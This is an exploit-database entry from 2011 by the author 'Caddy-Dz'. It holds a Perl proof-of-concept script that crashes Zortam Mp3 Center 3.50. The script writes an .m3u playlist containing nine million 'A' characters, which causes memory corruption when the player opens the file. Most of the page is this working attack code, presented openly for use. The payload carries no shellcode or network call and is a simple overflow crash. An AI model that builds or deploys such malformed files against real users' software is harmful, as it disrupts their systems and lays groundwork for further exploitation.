Zortam Mp3 Center 3.50 memory corruption vuln



EKU-ID: 882 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-08-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


####
# Exploit Title: Zortam Mp3 Center 3.50 memory corruption vuln
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Software Link: http://www.softpedia.com/get/Multimedia/Audio/Other-AUDIO-Tools/Zortam-Mp3-Center.shtml
# Category:: Local Exploits
# Tested on: [Windows Seven Edition Intйgral- French]
####

#!/usr/bin/perl
system ("cls");
system ("title Caddy-Dz...");
print "\t\t/////////////////////////////////////////////////\n";    
print "\t\t_________________________________________________\n";
print "\t\t\t Zortam Mp3 Center 3.50 memory corruption vuln\n";
print "\t\t\t Exploited by Caddy-Dz \n";
print "\t\t\t Website: Exploit-ID.com \n";
print "\t\t\t Email: islam_babia[at]hotmail.com\n";
print "\t\t_________________________________________________\n";
print "\n\n";

$file = "Caddy-Dz.m3u";
$my = "A" x 9000000;
print "\n\n[+] Creating file: $file ...\r\n";
sleep 1;
open(m3u, ">./$file") || die "\n\aCannot open $file: $!";
print m3u "$my";
close (m3u);
print "\n[+] file successfully created!\r\n";


####

# Peace From Algeria

####